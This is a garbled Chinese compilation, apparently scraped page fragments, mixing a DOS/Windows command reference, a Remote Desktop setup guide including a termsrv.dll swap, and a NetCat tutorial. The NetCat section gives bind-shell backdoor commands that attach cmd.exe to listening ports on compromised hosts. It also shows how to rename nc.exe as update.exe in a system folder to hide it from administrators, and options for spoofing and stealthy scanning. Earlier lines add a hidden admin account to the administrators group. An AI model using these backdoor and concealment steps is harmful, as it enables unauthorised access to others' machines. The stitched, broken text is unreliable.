DOS遠程桌面連接命令

1、DOS遠程桌面連接命令DOS遠程桌面連接命令 mstsc /v: 50 /consolecmd           運行        command刪除文件        rd        文件名/S創(chuàng)建文件  &

2、#160;     MD        文件名 1.        net user admin godmour /add 新建一個用戶名為 admin 密碼為 godmour 默認為user組成員2.        net user admin /del 將用戶名為admin的用戶刪除3. 

3、60;      net user admin /active:no        將用戶admin禁用4.        net user admin /active:yes 將用戶admin激活5.        net user admin 查看擁護admin用戶的情況6. 

4、0;      net localgroup administratros admin /add 提升用戶權限7.        net view     IP 查看遠程主機共享資源8.        net use          &#

5、160; x:IPsharename 遠程影射本地盤符 Z （建立連接 net use IPIPC$"password" /user:"name")9.        net user admin godmour         把admin的密碼修改成 godmour10. net start        

6、;  servername        啟動 telnet        服務          net start          servername     &

7、#160;  停止 telnet        服務運行 輸入cmd 回車在命令提示符下輸入 for %1 in (%windir%system32*.dll) do regsvr32.exe /s %1 還原系統(tǒng)tracert                 01    &#

8、160;   查看路由是否正常工作netstat命令netstat -r -s -n -a。當然，你也可以利用“netstat /?”命令來查看一下該命令的使用格式以及詳細的參數說明netstat參數含義如下-r 顯示本機路由表的內容-s 顯示每個協(xié)議的使用狀態(tài)（包括TCP協(xié)議、UDP協(xié)議、IP協(xié)議）-n 以數字表格形式顯示地址和端口-a 顯示所有主機的端口號運行Netstat -a命令將顯示計算機上網時與外部之間的所有連接，計算機端口與外部的連接情況等；而Netstat -s命令則顯示電腦網絡連接協(xié)議的統(tǒng)計信息。這樣你就可以看到當前你的電腦上網絡在進行哪些連接，

9、數據包發(fā)送和接收的詳細情況等等添加或刪除程序 control appwiz.cpl 管理工具             control admintoolsattrib 設置文件屬性          ctty 改變控制設備         defrag    

10、     磁盤碎片整理        doskey 調用和建立DOS宏命令 debug 程序調試命令          emm386 擴展內存管理         fc 文件比較          &

11、#160; fdisk 硬盤分區(qū) lh/loadhigh將程序裝入高端內存        move        移動文件，改目錄名         more分屏顯示 prompt         設置提示符     &

12、#160;          set 設置環(huán)境變量               smartdrv設置磁盤加速器setver 設置版本                  subst

13、路徑替換                   vol         顯示指定的磁盤卷標號 xcopy          拷貝目錄和文件          &#

14、160; mstsc XP自帶遠程                 secpol.msc /s            本地安全策略services.msc /s          服務  &

15、#160;               compmgmt.msc        計算機管理         jsjgl.msceventvwr.msc /s          事件查看器&#

16、160;           odbcad32.exe        數據源 (ODBC)          perfmon.msc /s           性能comexp.msc  &

17、#160;            組件服務              control userpasswords2           察看當前XP用戶gpedit.msc      

18、60;        組策略                regedit             注冊表            

19、 dxdiag         DirecTX 診斷工具gpedit.msc-組策略                    winver-檢查Windows版本            wmimgmt.

20、msc-打開windows管理體系結構(WMI) wupdmgr-windows更新程序           wscript-windows腳本宿主設置        write-寫字板 winmsd-系統(tǒng)信息                 

21、60;wiaacmgr-掃描儀和照相機向導         winchat-XP自帶局域網聊天 mem.exe-顯示內存使用情況          Msconfig.exe-系統(tǒng)配置實用程序           mplayer2-簡易widnows media player mspaint-畫圖板  

22、;                  mplayer2-媒體播放機                 magnify-放大鏡實用程序 mmc-打開控制臺         &

23、#160;      mobsync-同步命令                   drwtsn32- 系統(tǒng)醫(yī)生 devmgmt.msc- 設備管理器                dfrg.msc-

24、磁盤碎片整理程序           diskmgmt.msc-磁盤管理實用程序 dcomcnfg-打開系統(tǒng)組件服務          ddeshare-打開DDE共享設置            dvdplay-DVD播放器 net stop messenger-停止信使服務&#

25、160;       net start messenger-開始信使服務         notepad-打開記事本 nslookup-網絡管理的工具向導        ntbackup-系統(tǒng)備份和還原             narrator-屏

26、幕“講述人” ntmsmgr.msc-移動存儲管理器            ntmsoprq.msc-移動存儲管理員操作請求 netstat -an-(TC)命令檢查接口 syncapp-創(chuàng)建一個公文包            sysedit-系統(tǒng)配置編輯器        

27、0;    sigverif-文件簽名驗證程序 sndrec32-錄音機                    shrpubw-創(chuàng)建共享文件夾             secpol.msc-本地安全策略 syskey-系統(tǒng)加密，一旦加密就不能解開，保

28、護windows xp系統(tǒng)的雙重密碼 services.msc-本地服務設置              Sndvol32-音量控制程序               sfc.exe-系統(tǒng)文件檢查器 sfc /scannow-windows文件保護      &#

29、160;    tsshutdn-60秒倒計時關機命令         tourstart-xp簡介（安裝完成后出現(xiàn)的漫游xp程序） taskmgr-任務管理器                eventvwr-事件查看器         &

30、#160;       eudcedit-造字程序 explorer-打開資源管理器            packager-對象包裝程序               perfmon.msc-計算機性能監(jiān)測程序 progman-程序管理器   

31、60;            regedit.exe-注冊表                     rsop.msc-組策略結果集 regedt32-注冊表編輯器         

32、0;    rononce -p -15秒關機                   regsvr32 /u *.dll-停止dll文件運行 regsvr32 /u zipfldr.dll-取消ZIP支持             cmd.exe-CMD命令提示符

33、 chkdsk.exe-Chkdsk磁盤檢查            certmgr.msc-證書管理實用程序           calc-啟動計算器charmap-啟動字符映射表            cliconfg-SQL SERVER 客戶端網絡實用程

34、序         Clipbrd-剪貼板查看器 conf-啟動netmeeting            compmgmt.msc-計算機管理                 cleanmgr-垃圾整理 ciadv.msc-索引服務程序&

35、#160;             osk-打開屏幕鍵盤               odbcad32-ODBC數據源管理器 oobe/msoobe /a-檢查XP是否激活         lusrmgr.msc-本機用戶和組  

36、             logoff-注銷命令 iexpress-木馬捆綁工具，系統(tǒng)自帶          Nslookup-IP地址偵測器         fsmgmt.msc-共享文件夾管理器 utilman-輔助工具管理器      

37、;      gpedit.msc-組策略                     cleanmgr-垃圾整理 ciadv.msc-索引服務程序              odbcad32-ODBC數

38、據源管理器           oobe/msoobe /a-檢查XP是否激活 lusrmgr.msc-本機用戶和組              logoff-注銷命令                &

39、#160;  iexpress-木馬捆綁工具，系統(tǒng)自帶 Nslookup-IP地址偵測器              fsmgmt.msc-共享文件夾管理器           utilman-輔助工具管理器DOSDisk Operation System 磁盤操作系C: 盤符      &

40、#160;  Path 路徑        Filename        文件名         .ext 擴展名        Filespec 文件標識符          

41、 方括號中的項目是可選項，用戶可以根根據需要不輸入這些內容           大括號表示其中的項目必選一項 |            豎線表示兩側的內容可取其一            表示可重復項*      

42、;      表示一個字符串？           只代表一個字符查找以字母y開頭的所有文件，可以輸入以下命令：dir y*.*；如果要查找所有擴展名為exe的文件，可以用dir .exe。？只代表一個字符，例如我要查找第二個字母為s的所有文件，可以輸入：DIR ?s*.*。dir格式 dir C:pathfilename.ext/o/s/p/w/adir是DOS命令中最常用的一個/p 顯示信息滿一屏時，暫停顯示，按任意鍵后顯示下一屏/

43、o 排序顯示。o后面可以接不同意義的字母/w 只顯示文件名目錄名，每行五個文件名。即寬行顯示/s 將目錄及子目錄的全部目錄文件都顯示cd是英文change directory(改變目錄）的縮寫格式 cd C:path        逐層退出（cd.）copy在英文中是復制的意思復制一個或一組文件到指定的磁盤或目錄中        copy C:pathfilename.ext C:pathfilename.extC:purple目錄的所

44、有文件復制到軟盤C:>copy purple A:ren是英文rename（重新命名）的簡寫，對指定磁盤、目錄中的一個文件或一組文件更改名稱格式 ren C:pathfilename1.ext filename2.ext說明 改名操作只限于某個文件某組文件的名稱，它不會更改文件所在的目錄。如果使用了通配符，則對一批文件進行更名。type 功能 在屏幕上顯示文本文件內容命令        格式 type C:pathfilename.exttype命令用來在屏幕上快速、簡便地顯示文本文件的內容，擴展名為TXT的

45、文件是文本文件。如果用這個命令顯示擴展名為EXE或COM等其它文件，輸出的結果往往是一些亂七八糟的符號并伴有無規(guī)則的響鈴聲，有時甚至會出現(xiàn)死機現(xiàn)象。format 磁盤格式化        C:pathformat drive:/Sdiskcopy，翻譯成中文就是磁盤復制 復制出一個和原來磁盤內容一模一樣的磁盤格式 diskcopy源驅動器名目的驅動器名說明 它的主要用途就是用來備份。比如我們的電腦在剛買來時，會隨機附帶一些設備驅動程序磁盤，這些驅動程序在以后都有可能用到，為防止這些磁盤的損壞，一定要將它們都備份一套

46、，這時，使用diskcopy命令是比較快捷和方便的deltree 刪除目錄樹 格式 C:pathDELTREE C1:path1 C2:path2 說明 這個命令將整個指定目錄樹全部消滅，而不管它是否是只讀、隱藏與否。使用應特別小心。它是一個危險命令。mem是memory的縮寫功能 該命令用來查看你的計算機內存有多少，以及內存的使用情況 格式 直接鍵入mem命令chkdsk是check disk的縮寫。功能 用來檢查你的磁盤的使用情況。格式 chkdsk磁盤名說明 例如要檢查A盤使用情況，就輸入chkdskA: ，檢查c盤使用情況，就輸入chkdskC: ，如果直接輸入chkdsk，就檢查當前

47、磁盤的使用情況。sys 傳遞系統(tǒng)文件命令。將DOS的兩個隱含的系統(tǒng)IO.SYS和MSDOS.SYS傳送到目標磁盤的特定位置上，并將COMMAND.COM文件復制過去。完成后，目標盤成為DOS的啟動盤格式 C:pathSYS C1:path d2:說明 由于這幾個文件需要復制到特定位置上，所以用COPY命令完成的復制未必能夠啟動機器。能過SYS命令，DOS可以將目標盤已占據特定位置的文件移動，并將系統(tǒng)文件復制到相應位置上。參數C1:path用來指明系統(tǒng)文件所在目錄。如不指明，則缺省為當前盤的當前目錄。所以這個命令一般要在源盤的根目錄進行pass    &#

48、160;   功能 設定DOS尋找.COM、.EXE、.BAT文件的所在目錄 格式 path=drive:path;或path說明 只打path沒有參數時，只顯示環(huán)境變量內容。有參數時，重新設置path變量。在沒有指定path環(huán)境變量時，用戶發(fā)出的命令，DOS首先判斷其是否為內部命令，再查找當前目錄中是否有主文件名是該命令的可執(zhí)行文件，如果均不是，則顯示信息“Bad command or filename”。如果發(fā)出了指定路徑的命令，則在指定徑中依次查找，仍找不到則出現(xiàn)上述提示。cls      

49、0; 清除顯示器屏幕上的內容，使DOS提示符到屏幕左上角遠程桌面連接百科名片遠程桌面連接組件是從Windows 2000 Server開始由微軟公司提供的，在WINDOWS 2000 SERVER中他不是默認安裝的。該組件一經推出受到了很多用戶的擁護和喜好，所以在WINDOWS XP和2003中微軟公司將該組件的啟用方法進行了改革，通過簡單的勾選就可以完成在XP和2003下遠程桌面連接功能的開啟。 目錄隱藏1、遠程桌面的功能2、遠程桌面的前世今生3、啟動遠程桌面連接的方法（1）WINDOWS 2000SERVER3、遠程桌面的配置及應用一、必要組件安裝二、啟用或禁用遠程連接三、在客戶

50、端應用四、終端服務配置4、使用遠程桌面連接的方法（1）WINDOWS XP和2003操作系統(tǒng)：（2）其他WINDOWS操作系統(tǒng)：5、遠程桌面的端口 1、遠程桌面的功能 2、遠程桌面的前世今生 3、啟動遠程桌面連接的方法 （1）WINDOWS 2000SERVER3、遠程桌面的配置及應用 一、必要組件安裝 二、啟用或禁用遠程連接 三、在客戶端應用 四、終端服務配置4、使用遠程桌面連接的方法 （1）WINDOWS XP和2003操作系統(tǒng)： （2）其他WINDOWS操作系統(tǒng)：5、遠程桌面的端口  編輯本段1、遠程桌面的功能當某臺計算機開啟了遠程桌面連接功能后我們就可以在網絡的另一

51、端控制這臺計算機了，通過遠程桌面功能我們可以實時的操作這臺計算機，在上面安裝軟件，運行程序，所有的一切都好像是直接在該計算機上操作一樣。這就是遠程桌面的最大功能，通過該功能網絡管理員可以在家中安全的控制單位的服務器，而且由于該功能是系統(tǒng)內置的所以比其他第三方遠程控制工具使用更方便更靈活。編輯本段2、遠程桌面的前世今生說起遠程桌面很多用戶都認為是從WIN2000 SERVER才開始引入的，實際上我們可以在WIN98甚至是DOS中看到他的身影。遠程桌面采用的是一種類似TELNET的技術，他是從TELNET協(xié)議發(fā)展而來的。 計算機發(fā)展的早期在很多客戶機硬件配置不高無法獨立運行程序的情況下，TELNE

52、T協(xié)議應運而生，他是一種C/S模式，客戶機可以通過TELNET登錄到高配置的服務器上，在服務器上運行程序。當程序運行時所有的運算與存儲都是教給服務器來完成的，當運算結束后服務器才把結果反饋回客戶機，這樣就可以在客戶機配置不夠的情況下完成程序的運行工作，而且運行結果出來的一點不慢。 遠程桌面連接就是從TELNET發(fā)展而來的，通俗的講他就是圖形化的TELNET。所以在下文中我們講解遠程桌面連接的使用時也會稍微介紹一些TELNET的相關知識。編輯本段3、啟動遠程桌面連接的方法WINDOWS 2000 SERVER，WINDOWS XP和WINDOWS 2003，這三個系統(tǒng)的開啟遠程桌面方法各不相同，

53、我們一一介紹。 （1）WINDOWS 2000SERVERWINDOWS2000系統(tǒng)中PROFESSIONAL版本是不能開啟遠程桌面功能讓別人訪問的，但SERVER版可以開啟，不過需要我們安裝相應的WINDOWS組件。方法如下： 第一步：通過任務欄的“開始->設置->控制面板”，選擇里頭的“添加/刪除程序”。 第二步：在左邊選擇“添加/刪除WINDOWS組件”。 第三步：稍后會出現(xiàn)添加刪除WINDOWS組件窗口，我們從中選擇“終端服務”，然后點“下一步”進行安裝。這里要注意一點的是在安裝過程中需要我們插入WINDOWS 2000SERVER系統(tǒng)光盤到光驅中。 第四步：安裝完畢后需要

54、重新啟動計算機，重啟后就完成了在WINDOWS 2000SERVER下的遠程桌面連接功能的安裝工作。 （2）WINDOWS XP 正如上文提到的，WINDOWS2000引入遠程桌面連接功能后受到了廣大用戶的好評，大家普遍認為開啟該功能的方法太復雜，而且在使用時不能保證每個人都擁有WINDOWS2000SERVER光盤。因此在XP和2003系統(tǒng)中微軟將遠程桌面開啟的操作進行了簡化。 第一步：在桌面“我的電腦”上點鼠標右鍵，選擇“屬性”。 第二步：在彈出的系統(tǒng)屬性窗口中選擇“遠程”標簽。 第三步：在遠程標簽中找到“遠程桌面”，在“容許用戶連接到這臺計算機”前打上對勾后確定即可完成XP下遠程桌面連接

55、功能的啟用。 （3）WINDOWS 2003 WINDOWS2003開啟方法和XP類似，同樣對操作步驟進行了簡化。方法如下： 第一步：在桌面“我的電腦”上點鼠標右鍵，選擇“屬性”。 第二步：在彈出的系統(tǒng)屬性窗口中選擇“遠程”標簽。 第三步：在遠程標簽中找到“遠程桌面”，在“容許用戶連接到這臺計算機”前打上對勾后確定即可完成2003下遠程桌面連接功能的啟用。編輯本段3、遠程桌面的配置及應用遠程桌面 Web 連接是 ActiveX 控件，該控件實際上提供了與完整終端服務客戶端相同的功能，但它旨在通過 Web 傳遞該功能。嵌入網頁時，即使用戶的計算機上并未安裝完整的遠程桌面連接客戶端，遠程桌面 We

56、b 連接也可以作為與終端服務器連接的客戶端會話的宿主。（以Windows2003為例）一、必要組件安裝打開“控制面板”“添加或刪除程序”“添加或刪除Windows組件”“應用程序服務器”“詳細信息”“Internet信息服務（IIS）”“詳細信息”“萬維網服務”“詳細信息”勾選“遠程桌面Web連接”連點三個“確定”“下一步”等待完成。二、啟用或禁用遠程連接1、打開控制面板中的系統(tǒng)。2、在“遠程”選項卡上，選中或清除“允許用戶遠程連接到您的計算機”復選框。單擊“選擇遠程用戶”，在隨后出現(xiàn)的對話框中添加或刪除用戶，單擊“確定”（兩次）。三、在客戶端應用在“開始”“運行”，在運行框中鍵入“HTTP:

57、/服務器/TSWEB”“確定”，若是第一次在本客戶端使用，會要求下載ActiveX 控件，在“服務器”后的文本框中鍵入服務器名，在“大小”后的下拉列表中選擇遠程桌面的分辨率，請選擇“全屏”，（否則遠程桌面會顯示在瀏覽器中），回車后即可看到登錄窗口，鍵入用戶名與密碼即可進入遠程桌面。其它就同使用本地機一樣。若要退出，請選擇“注銷”，若一會兒后還要進入，請選擇“斷開”，再進入時方法同前。當然如果權限足夠大，還可選擇“重新啟動”、“關機”。注意在使用時，不要直接關掉“遠程桌機Web連接”的瀏覽器窗口，否則遠程桌面相當于“斷開”，并未注銷。四、終端服務配置1、請依次單擊“開始”和“控制面板”，雙擊“管

58、理工具”，再雙擊“終端服務配置”。在控制臺樹中，單擊“連接”。在詳細信息窗格中，右鍵單擊要配置客戶端設備映射的連接，然后單擊“屬性”。若要使遠程桌面也成為多媒體，請在“客戶端設置”選項卡下選中“顏色深度的最大值”，并在下拉列表中選擇適當的值。“禁用下列項目”下，請不要選中“音頻映射”，以使遠程桌面也能播放音樂。2、默認的登錄名設置3、在“Internet 信息服務（IIS）管理器”下查找到TSWEB虛擬目錄的具體位置，修改Default.htm文件，就不需要每次填入服務器名。用記事本打開Default.htm，找到input name=“Server”，修改Value=“服務器名或IP地址”，

59、保存退出。1編輯本段4、使用遠程桌面連接的方法使用遠程桌面連接的方法很簡單，因為一旦連接到服務器上就和操作本地計算機一樣了。所以唯一要講解的就是連接操作。如何連接到開啟了遠程桌面功能的計算機呢？我們需要遠程桌面連接登錄器。 （1）WINDOWS XP和2003操作系統(tǒng)：這兩個系統(tǒng)將遠程桌面連接程序內置到附件中，我們不用安裝任何程序就可以使用遠程桌面連接。 第一步：通過任務欄的“開始->程序->附件->通訊->遠程桌面連接”來啟動登錄程序 （命令號運行：mstsc )第二步：在圖4界面中的“計算機”處輸入開啟了遠程桌面功能的計算機IP地址。 第三步：點擊“連接”按鈕后我們

60、就可以成功登錄到該計算機上了，連接上去后如圖5所示，和操作自己計算機一樣方便一樣快捷。 （對方的機要開啟了允許遠程連接到此計算機，具體做法是，我的電腦屬性遠程遠程桌面，把勾打上.確定）（2）其他WINDOWS操作系統(tǒng)：2000及以前的WINDOWS中系統(tǒng)沒有將登錄工具放到附件中，我們有兩個方法獲得登錄器并實現(xiàn)遠程桌面的連接功能。 方法一：使用XP光盤登錄器MSRDPCLI 在XP系統(tǒng)光盤盤符下SUPPORTTOOLS目錄有一個叫做MSRDPCLI.exe的程序，該程序實際上是一個遠程桌面連接登錄器，在WIN98/2000機器上運行XP光盤目錄下的msrdpcli.exe。將自動安裝遠程桌面連接

61、程序。安裝過程非常簡單，一路“下一步”即可。完畢以后通過“開始->程序->附件->通訊->遠程桌面連接”就可以登錄網絡上開啟遠程桌面功能的計算機了。 方法二：第三方登錄器 實際上網絡中有很多站點都提供了遠程桌面登錄器的下載，我們在98系統(tǒng)或2000系統(tǒng)上下載該登錄器就可以完成登錄遠程桌面的功能。編輯本段5、遠程桌面的端口3389端口，這一端口最好不要開，也就是說不要開啟遠程桌面，因為，HACKER會通過這一端口進入您的計算機，種植木馬，現(xiàn)在我們的計算機安全意識越來越強，開放135端口的計算機越來越少，所以HACKER們就希望通過這一端口抓肉雞。編輯本段6、使Window

62、s XP的遠程桌面支持多用戶登陸在Windows XP中，遠程桌面只能一個用戶登陸，這樣在某些時候其實是不方便的，不過我們可以通過以下辦法實現(xiàn)多用戶使用遠程桌面登陸。打開 Windows XP Pro SP2 遠程桌面（遠程協(xié)助）的多用戶支持 Enable Concurrent Sessions主要分為三步1. 打開多用戶支持(注冊表regedit)2. 替換 termsvr.dll3. 更改用戶登錄或注銷的方式：使用歡迎屏幕，使用快速用戶切換控制面板用戶賬戶更改用戶登錄或注銷的方式1. 通過注冊表打開多用戶支持將以下內容復制到記事本，保存成*.reg文件，然后打開保存的文件導入注冊表即可RE

63、GEDIT4HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerLicensing Core"EnableConcurrentSessions"=dword:00000001也可以使用命令行完成，將以下內容復制到記事本，粘貼到記事本保存成*.bat文件，然后打開保存的文件即可完成echo offsetlocalset regkey="HKLMSYSTEMCurrentControlSetControlTerminal ServerLicensing Core"reg add %re

64、gkey% /v EnableConcurrentSessions /T REG_DWORD /D 1 /fendlocal還有一種方式是點“開始”菜單，點運行，在彈出的對話框中，鍵入REGEDIT然后按回車打開注冊表編輯器，在注冊表中找到HKEY_LOCAL_MACHINESystemCurrentControlSetControlTerminal ServerLicensing Core，建立一個類型為DWORD的新鍵，鍵名為"EnableConcurrentSessions"，鍵值為“1”。2. 替換系統(tǒng)中的termsvr.dll從相關站點下載到termsrv.dll

65、文件替換兩處C:WINDOWSsystem32dllcachetermsrv.dllC:WINDOWSsystem32termsrv.dll系統(tǒng)應該會提示文件使用中無法替換，因為文件使用中，最簡單的辦法就是先把這兩個文件改個名字（先改C:WINDOWSsystem32dllcachetermsrv.dll的文件名，然后再改C:WINDOWSsystem32termsrv.dll的，順序不能錯，否則會自動恢復），改名后系統(tǒng)可能會提示系統(tǒng)文件被修改，不用理它，按取消再按確定就可以了，然后把下載到的文件解壓到相應的位置即可.3. 更改用戶登錄或注銷的方式：使用歡迎屏幕，使用快速用戶切換更改方法：打開

66、控制面板打開用戶賬戶點更改用戶登錄或注銷的方式勾選“使用歡迎屏幕”和“使用快速用戶切換”，點應用選項。然后重新啟動電腦即可完成操作。相關系統(tǒng)服務 （Related OS Services）：TermServiceTerminal Services允許多位用戶連接并控制一臺機器，并且在遠程計算機上顯示桌面和應用程序。這是遠程桌面(包括管理員的遠程桌面)、快速用戶轉換、遠程協(xié)助和終端服務器的基礎結構。FastUserSwitchingCompatibilityFast User Switching Compatibility為在多用戶下需要協(xié)助的應用程序提供管理。PS：這樣設置之后系統(tǒng)就可以用多個

67、用戶進行遠程桌面登陸了，但是在測試中發(fā)現(xiàn)，這樣僅僅能登陸2個不同用戶名的用戶，當登陸第三個時，就會提示要斷開已經登陸的其中一個了，不過對于我們而言，通常已經夠用了！補充：經本人實際應用，發(fā)現(xiàn)“使Windows XP的遠程桌面支持多用戶登陸”中的第2步：替換系統(tǒng)中的termsvr.dll 需要在安全模式下替換才能生效。（附：安全模式進入方式：開機時一直按F8鍵會跳出系統(tǒng)選擇菜單，選擇第一個：安全模式 即可進入。）【51CTO.com 專家特稿】在入侵中它是最經典的工具之一 ，NetCat被所有的網絡安全愛好者和研究者稱之為瑞士軍刀，通過名字大家就能知道他的功能足夠豐富。nc的全稱為NetCat,

68、它能夠建立并接受傳輸控制協(xié)議（TCP)和用戶數據報協(xié)議(UDP)的連接，Netcat可在這些連接上讀寫數據，直到連接關閉為止。它可以通過手工或者腳本與應用層的網絡應用程序或服務進行交互。從技術上來講，NetCat并不能產生UDP連接，因為UDP是一種無連接的協(xié)議。NetCat沒有圖形界面，很粗糙，很原始。nc可以通過很多途徑下載得到，unix和Winodws平臺下的官方站點是：http：/nc的命令行nc的基本命令行形式是 nc options host ports,其中host是要掃描的主機名或IP地址，ports要么是一個單獨的端口，要么是一個端口范圍(用m-n的形式指定)，要么是一系列用

69、空格隔開的單個端口。-d  只對Windows操作系統(tǒng)有用，該選項使NetCat以隱蔽模式工作，從而脫離MS-DOS命令提示符下環(huán)境運行，使得nc不需要保持打開命令窗口便可在監(jiān)聽模式下運行，也可以幫助黑客很好地隱藏監(jiān)聽NetCat實例而不被系統(tǒng)管理員發(fā)現(xiàn)。-e 如果NetCat使用gaping_security_hole選項進行編譯，那么只要某人在NET后臺所監(jiān)聽的任何端口上建立連接，該NetCat都將執(zhí)行,且客戶端的NetCat會通過管道將I/O傳輸到在別處監(jiān)聽的另一個NetCat實例中。使用這個選項非常危險，除非你對nc相當了解，起碼知道你自己在做什么。這是在系統(tǒng)中建立

70、后門shell的一個非?？旖萸胰菀椎姆椒ā?i 延時間隔，表示在兩次數據發(fā)送之間nc等待的時間。例如：當經過管道傳輸一個文件到nc的時候，在傳輸輸入的下一行之前，nc將等待的秒數。當使用nc對一臺主機的多個端口之間進行操作時，在切換到下一個端口之前，nc等待的秒數。這樣可以使黑客在進行數據傳輸或對一個服務進行攻擊的時候更加隱蔽，也可以幫助你的端口掃描不被入侵檢測系統(tǒng)和系統(tǒng)管理員發(fā)現(xiàn)。-g這個選項具有欺騙性。nc支持loose source routing（松散源路由）。你可以在命令行中指定多達8個-g選項來強迫nc流量經過特定的IP地址，這在你為流量設置偽造的源IP地址時，可以利用這個方法達到

71、通過防火墻的過濾器或者允許訪問主機列表，希望接收到從主機返回的響應。-G該選項讓用戶在-g選項所指定的路由列表中指定的一個地址作為當前的下一路由，由于IP地址為4字節(jié)大小（IPV4），所以這個參數總是4字節(jié)的倍數；例如，4代表路由表中的第一個IP地址，8代表第二個IP地址，依次類推。這在偽造部分源路由表使得報文看起來相當的有用。在進行欺騙和源路由時，這個功能有助于屏蔽你的位置，但也不一定能接收到響應報文，因為響應報文將經過由偽造的IP地址反路由回來。-l 該選項切換nc的監(jiān)聽模式。此選項必須與-p選項一起使用以告訴nc綁定某個指定的TCP端口并等待到來的連接。若換成-u選項，則應使用UDP端口

72、而非TCP端口。-L 該選項在Windows版本中有用，當一個連接被關閉后，使用相同的命令行選項進行重啟監(jiān)聽模式，即使此時初始的連接已經結束，nc也能在不需要用戶干涉的情況下接收后面新的連接。與-l一樣，必須與-p同時使用。-n 該選項告訴我們nc不做任何主機名查找的工作。-0對數據執(zhí)行一次十六進制轉儲（hex dump ）并將其存儲在hexfile中。命令nc-o hexfile將把雙向通信的數據記錄下來，在每行的開始處會有一個“<"或">”用來分別指示是進入數據還是外出數據。如果只想得到對進入數據的十六進制轉儲，可以使用 nc -ohexfile命令。-p讓

73、用戶指定一個nc應使用的本地端口號。當通過-l或-L選項來使用監(jiān)聽模式的時候，這個參數是必需的。如果沒有為外出連接指定這個參數，則與大多數其他TCP或UDP客戶程序的做法一樣，nc將使用系統(tǒng)分配給他的任何端口。-r 該參數使nc可以隨機選擇本地和遠程端口。當使用nc在系統(tǒng)中范圍很大的一批端口上獲取信息時，要想混合源端口和目標端口的順序看起來不怎么象端口掃描，這個選項是很有用的。當這個選項與-i選項和一個足夠大的間隔結合使用的時候，在不被注意的端口掃描成功幾率能得到很大提升。-s 指定nc建立連接時所使用的IP地址，該選項允許黑客做一些工作，它允許黑客隱藏他們的IP地址或假冒他人的IP地址，但是

74、要得到路由到他們所欺騙的地址的任何信息，都需要使用-g源路由選項。其次，當處于監(jiān)聽模式時，大多數情況下都可以與一個已經監(jiān)聽的服務“預先綁定”，所有TCP和UDP服務都綁定到某個端口。-t 如果使用telnet選項編譯，nc就可以與telnet服務器進行telnet選項協(xié)商，雖然它的響應是毫無意義的信息，但可以通過該狀態(tài)看到連接23端口的信息。-u nc使用UDP而非TCP，在客戶模式和監(jiān)聽模式下都起作用。-v 控制nc將要做的事情達到的程度，如使用nc -v，那么nc將僅吐出它所接收到的數據，一個單獨的-v可以知道它連接或綁定的地址是否有問題發(fā)生，第2個-v可以讓nc在一個連接結束的時候讓你知

75、道這個連接總共發(fā)送和接收了多少數據。-w控制在一個連接上nc放棄之前等待的時間。同時也告訴nc當在標準輸入上接收到一個eof（end-of-file）之后應該等待多長時間來關閉連接并退出。如果你通過nc向遠程服務器發(fā)送命令并且期望大量的數據返回（例如：向一臺web服務器發(fā)送一個http命令以下載一個大文件），該選項是很有用的。nc的具體使用c:nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隱藏一個NetCat后門。c:nc.exe -p 4455 -d -L -e cmd.exe 這個命令可以讓黑客利用NetCat重新返回系統(tǒng)，直到系統(tǒng)管理員在任務管理器中看見nc.

76、exe在運行，從而發(fā)現(xiàn)這個后門，我們一樣可以把它做的更加隱蔽，c:move nc.exe c:windowssystem32Driversupdate.exec:windowssysteme32driversupdate.exe -p 4455 -d -L -e cmd.exe系統(tǒng)管理員可能把特權附屬于一些無害的程序，如update.exe等，黑客也可以隱藏命令行。c:windowssystme32driversupdate.execmd line: -l -p 4455 -d -L -e cmd.exec:>nc -l - p 80  監(jiān)聽80端口nc -l -p

77、80 >c:log.dat  監(jiān)聽80端口，并把信息記錄到log.dat中nc -v -l -p 80  監(jiān)聽80端口，并顯示端口信息nc -vv -l -p 80 監(jiān)聽80端口，顯示更詳細的端口信息nc -l -p 80 -t -e cmd.exe監(jiān)聽本地的80端口的入站信息，同時將cmd.exe重定向到80端口，當有人連接的時候，就讓cmd.exe以telnet的形式應答。當然這個最好用在控制的肉雞上。nc -v ip port 掃瞄某IP的某個端口nc -v -z ip port-port掃描某IP的端口到某端口nc -v -z -u ip&

78、#160; port-port掃描某IP的某UDP端口到某UDP端口【51CTO.com獨家特稿】相信不少網絡管理員在平時的工作中，需要對局域網中的多臺服務器系統(tǒng)進行管理維護；為了提高管理維護效率，他們往往會開通遠程桌面連接功能，以便日后可以在局域網的任何位置處都能及時進行管理、維護操作?？墒窃诔浞窒硎苓h程管理便利的同時，網絡管理員們時常也會遭遇遠程連接不順暢的麻煩；面對這樣的麻煩，很多人常常表現(xiàn)得手足無措，不知道該如何進行快速應對。為此，本文就從細節(jié)出發(fā)，為各位朋友貢獻幾則讓遠程連接一路通暢的私房秘籍，相信大家能從中收到一些啟發(fā)！1、不對空密碼帳號限制  

79、60; 在安裝、配置服務器系統(tǒng)的過程中，很多網絡管理員為了圖方便，往往會將administrator帳號的密碼設置成空白密碼，日后不需要輸入系統(tǒng)管理員帳號密碼，就能實現(xiàn)快速登錄目的。可是，當我們嘗試在局域網的其他計算機中，利用administrator帳號來遠程連接目標服務器系統(tǒng)時，可能會發(fā)現(xiàn)遠程連接怎么也不能成功，在對各種可能因素進行仔細檢查之后，相信不少網絡管理員也找不到具體的故障原因。遇到這種現(xiàn)象時，我們不妨在目標服務器系統(tǒng)中，用鼠標右鍵單擊對應系統(tǒng)桌面中的“我的電腦”圖標，從彈出的快捷菜單中執(zhí)行“屬性”命令，打開目標服務器的系統(tǒng)屬性設置窗口，單擊其中的“遠程”標簽，并在對應標簽設置頁面中，看看“允許用戶遠程連接到這臺計算機”選項是否處于有效激活狀態(tài)，如果發(fā)現(xiàn)該選項處于不可點選狀態(tài)時，那問題很可能是服務器系統(tǒng)對空白密碼的訪問權限進行了限制，此時我們必須按照下面的操作來取消系統(tǒng)對空白密碼的限制：    首先以系統(tǒng)管理員權限登錄進入目標服務器系統(tǒng)桌面，依次單擊其中的“開始